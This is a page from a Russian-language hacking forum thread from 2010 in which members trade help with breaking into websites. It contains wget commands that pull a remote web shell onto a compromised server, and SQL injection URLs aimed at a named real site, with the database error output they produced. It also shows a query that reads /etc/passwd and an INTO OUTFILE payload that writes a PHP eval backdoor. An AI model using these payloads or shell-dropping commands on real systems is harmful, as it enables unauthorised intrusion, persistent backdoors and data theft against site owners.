Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
Page 630 of 1207
  1. DIEZalok

    DIEZalok Banned

    Joined:
    22 Jan 2009
    Messages:
    14
    Likes Received:
    11
    Reputations:
    12

    1. Писать не -o, а -O (зааглавная).
    2. Правильно писать так: wget http://shell.com/shell.txt -O shell.php
    -O - чтобы залить с другим именем.
    -o - вместо шелла заливает по заданному адресу РЕЗУЛЬТАТ ЗАЛИВКИ, т.е. это не то.
    А может прав нету? Проверь id; ls -la;
    Если и вправду прав нету, то ищи где есть и делай так:
    cd /tut/prava/0777/; wget http://xx.narod.ru/shell.txt -O shell.php
    или в -O укажи путь новый, т.е. чтобы cd не писать.
     
    #12581 DIEZalok, 28 Apr 2010
    1 person likes this.
  2. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    464
    Likes Received:
    62
    Reputations:
    26
    DIEZalok Прочитай plz личку)
     
    #12582 GroM88, 28 Apr 2010
  3. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    неее не катит....
    http://www.looplifter.co.uk/news.asp?id=1
     
    #12583 pinch, 28 Apr 2010
  4. v1d0qz

    v1d0qz Elder - Старейшина

    Joined:
    21 Jul 2007
    Messages:
    67
    Likes Received:
    90
    Reputations:
    52

    http://www.looplifter.co.uk/news.asp?id=5+and+1=(select+top+1+cast(table_name+as+int)+from+information_schema.columns)--

    Я конечно понимаю что методом тыка, может что-то/когда-то получится, но всё же...Для начала узнайте что находится в базе information_schema и станет намного легче искать решения проблемы.
     
    #12584 v1d0qz, 28 Apr 2010
    Last edited: 28 Apr 2010
  5. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    вот объясните (незнаком я с внутренним миром бд) впервые вижу такое сочетание:
    http://www.looplifter.co.uk/news.asp?id=5+and+1=(select+top+1+table_name+from+information_schema.columns)--
    такой запрос что выводит? таблицу, колонку?

    вроде вывод ВСЕХ колонок бд имеет вид:
    http://www.looplifter.co.uk/news.asp?id=5+and+1=(select+top+1+column_name+from+information_schema.columns)--

    вывод ВСЕХ таблиц бд имеет вид:
    http://www.looplifter.co.uk/news.asp?id=5+and+1=(select+top+1+table_name+from+information_schema.tables)--
     
    #12585 pinch, 28 Apr 2010
  6. DrakonHaSh

    DrakonHaSh Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    118
    Likes Received:
    29
    Reputations:
    24
    pinch
    1. слепая sql:

    http://www.looplifter.co.uk/news.asp?id=5 and '1'=(select 1)
    => так же как и при id=5

    http://www.looplifter.co.uk/news.asp?id=5 and '1'=(select 2)
    => пусто

    2.
    http://www.looplifter.co.uk/news.asp?id=5 and 0<(select db_name())--
    =>
    Microsoft OLE DB Provider for SQL Server error '80040e07'
    Syntax error converting the nvarchar value 'Looplifter' to a column of data type int.
    /news.asp, line 355
    ==> не такая уж и слепая

    http://www.looplifter.co.uk/news.asp?id=5 and 0<(select count(*) from information_schema.columns)--
    => так же как и при id=5

    http://www.looplifter.co.uk/news.asp?id=5 and 0<(select count(*) from information_schema.tables)--
    => пусто

    http://www.looplifter.co.uk/news.asp?id=5 and 0<(select count(*) from information_schema.columns) and '0'<(select count(*) from information_schema.tables)--
    => пусто

    http://www.looplifter.co.uk/news.asp?id=5 and 0<(select count(*) from information_schema.columns) and '0'<(select 'count(*) from information_schema.tables')--
    => так же как и при id=5

    ==> наврятли там какой-то уж очень интеллектуальный фильтр, может просто запрещены права юзеру Looplifter на чтение information_schema.tables ?
     
    #12586 DrakonHaSh, 28 Apr 2010
    Last edited: 28 Apr 2010
    1 person likes this.
  7. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    =))) эт не какаята хрень а MSSQL 2000
     
    #12587 pinch, 28 Apr 2010
  8. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    народ есть ли альтернативный способ как найти админку?

    уже не первый раз сталкиваюсь с такой проблемой,пароль есть- а админку не найти ..
    программой делаю перебор стандартных админок типа admin,administrator,cms,admin_panel etc...
    результатов нет!

    есть ли другой способ ?
     
    _________________________
    #12588 Konqi, 28 Apr 2010
  9. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,178
    Likes Received:
    617
    Reputations:
    690
    2Konqi
    http://madnet.name/tools/madss/
    или юзай прогу IntelliTamper
    и еще попробуй пароль к хостеру если нету админки все таки...
    +проскань порты
    например панелька http://188.40.XX.XX:2222/
     
    _________________________
    #12589 shell_c0de, 28 Apr 2010
  10. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    попробуй robots.txt может прокатит.......
     
    #12590 AC//DC, 28 Apr 2010
  11. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886

    нету роботов,всегда проверяю

    а вообще нашел хорошую прагу IntelliTampor
     
    _________________________
    #12591 Konqi, 28 Apr 2010
  12. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    спасибо,папробую

    не видя твой пост сам писал про прагу :)

    только что нашел
     
    _________________________
    #12592 Konqi, 28 Apr 2010
  13. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    http://forum.xakep.ru/m_1653053/tm.htm
     
    #12593 Strilo4ka, 28 Apr 2010
    Last edited: 29 Apr 2010
  14. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    Strilo4ka спасибо
     
    _________________________
    #12594 Konqi, 28 Apr 2010
  15. Nek1t

    Nek1t Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    181
    Likes Received:
    16
    Reputations:
    1
    И еще раз возвращаясь к теме вывода данных в SQL-inj в ошибках.
    Правильно понимаю, что максимум можно вывести 64 символа чистых данных(единица в конце отбрасывается), и единственный выход - резать на подстроки?
     
    #12595 Nek1t, 28 Apr 2010
  16. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    есть шелл..там есть например папка www.xxx.com
    и там есть папки например тест1 тест2 и т.д///

    тест1 drwxrwxrwx зеленый..тест2 красный..

    в тест1 моjно все зделать а в тест2 нелзя ничево (едит уплоад)

    кояда откриваеш site автоматичецки откривается папка тест2..как зделат чтоби тест1 откривался..
     
    #12596 LokbatanLi, 29 Apr 2010
  17. DrakonHaSh

    DrakonHaSh Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    118
    Likes Received:
    29
    Reputations:
    24
    а что, www.xxx.com/test1/shell.php не прокатывает ?
     
    #12597 DrakonHaSh, 29 Apr 2010
  18. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    есть вопрос насчет floor

    сделал запрос чтоб прочест файли на сервере:
    PHP:
     and (select 1 from (select count(0),concat((select+substring(load_file('/etc/passwd'),1,50LIMIT 0,1),floor(rand(0)*3)) from information_schema.tables  group by 2 limit 1,1)a)--
    норм выводит но когда доходим до 494 символа то ничего не выводит.

    PHP:
     and (select 1 from (select count(0),concat((select+substring(load_file('/etc/passwd'),1,50LIMIT 0,1),floor(rand(0)*3)) from information_schema.tables  group by 2 limit 1,1)a)--
    через chat_length проверил но там 677021 символов!!!

    Остальные файлы тоже читается до 494 символов. Тут на одного запроса пришлос писать 64символов так как floor большего режет. Но поэтапно тоже не больше 494 ((

    Правда запрос через хедер идет. Может кто обьяснит?? И вообше тут можно into outfile делать если прав есть?
     
    #12598 YuNi|[c, 30 Apr 2010
  19. Dare

    Dare Elder - Старейшина

    Joined:
    26 Apr 2010
    Messages:
    53
    Likes Received:
    24
    Reputations:
    17
    Именно через floor хочешь? Ведь можно таким методом в подобных условиях лить:

    Code:
    +limit+1+into+outfile+'/путь_до_папки_доступной_на_запись/shell.php'+lines+terminated+by+"<?php+eval($_REQUEST[ec]);?>"--+
     
    #12599 Dare, 30 Apr 2010
    2 people like this.
  20. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    спс за ответ но не очень то понял тебя, в каких условиях гриш? Судя по запросу оно должно дополнят мой запрос? Хотя так не пашет
     
    #12600 YuNi|[c, 30 Apr 2010
(You must log in or sign up to post here.)
Page 630 of 1207
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.